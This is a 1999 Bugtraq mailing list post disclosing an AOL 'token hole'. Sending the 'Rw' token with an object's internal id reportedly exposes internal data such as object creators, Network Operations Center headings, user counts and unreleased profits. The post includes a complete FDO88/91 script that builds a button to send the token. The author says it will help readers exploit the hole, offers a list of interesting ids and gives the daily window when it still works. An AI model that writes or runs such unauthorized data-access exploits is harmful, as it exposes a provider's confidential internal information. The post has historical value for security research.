Home page logo
/

bugtraq logo Bugtraq mailing list archives

America Online Token Hole
From: mackk () RPI EDU (Kevin Mack)
Date: Thu, 8 Jul 1999 11:18:33 -0400


Normally I wouldn't post things of this nature, but I thought it was important enough. About a year ago, I found out 
that by sending the "Rw" token to the AOL host while signed on along with the object's internal id as arg, any user 
could get detailed info about any object on the system. Included in this information is the user who created the object 
and tons of other information like its current viewrule and AOL url. This was all great for about a week until AOL 
officially fixed the hole. Normally only internal users are allowed such access for security reasons. Using this 
exploit, anyone can see headings in AOL's Network Operations Center and look at user count information and AOL mothly 
profits before they are even released. AOL put all there stuff online...Anyways the hole still exists but is windowed 
for only about an hour a day. I have no clue why and it seems random... For example yesterday July 7th it existed 
between 6:30-7:30PM EST. Here is a sample FDO88/91 that will create a button to the send the Rw token w arg and help 
you exploit..fill the internal id with any number you wish to see..i do have a listing of interesting id if anyone 
wants to follow this further....and goodluck with the timing...

man_start_object < trigger, "" >
mat_relative_tag < 22 >
act_replace_select_action
< 
uni_start_stream 
sm_send_token_arg <"Rw", INTERNAL ID HERE>
uni_end_stream 

mat_precise_x < 0 > 
mat_precise_y < 226 > 
mat_font_sis < small_fonts, 7, normal> 
mat_art_id < 1-0-21184 >
mat_bool_default < yes > 
man_end_object 

comments questions..   mackk () rpi edu


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault